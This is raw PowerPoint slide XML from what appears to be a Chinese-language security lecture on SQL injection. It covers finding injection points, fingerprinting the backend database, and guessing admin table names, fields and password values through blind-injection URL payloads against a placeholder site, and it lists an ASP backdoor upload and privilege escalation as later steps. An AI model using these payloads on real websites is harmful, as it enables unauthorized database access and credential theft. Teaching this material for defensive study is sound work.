              <a:t>注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断后台数据库类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入进行后台口令拆解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>后门，得到默认账户权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>本地特权提升与利用数据库扩展存储过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2999371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88640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8181726" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入点存在于形如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的动态网页</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>手工审查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Google Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入点验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>整数型参数：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>加单引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> ：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” ：正常页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” ：空白页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>字符串参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>加单引号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> ：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>‘ and ’1‘=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” ：正常页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>‘ and ’1‘=’2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” ：空白页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22480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8001000" cy="459904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断后台数据库类型 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>应用程序流行的后台数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>ACCESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>利用数据库服务器的系统变量进行判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>basedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xxx.asp?some_r</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>()&gt;0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>利用数据库服务器的系统表进行判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>ACCESS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>msysobjects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>)&gt;0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296957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9D044A5A-0DF7-544D-897D-85D1D8DF6AE5}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440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396055C3-BBF2-584A-B47D-5B0D3058FE99}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="116632"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入进行后台口令拆解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44037" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="4413250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>猜解后台口令表表名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and (select count (*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guessed_tbl_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&gt;0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>猜解字段名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://SITE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xxx.asp?some_rec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>yyy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and (select Count(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guessed_rec_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) from Admin) &gt; 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>猜解字段值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>二分法逼近</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字段长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
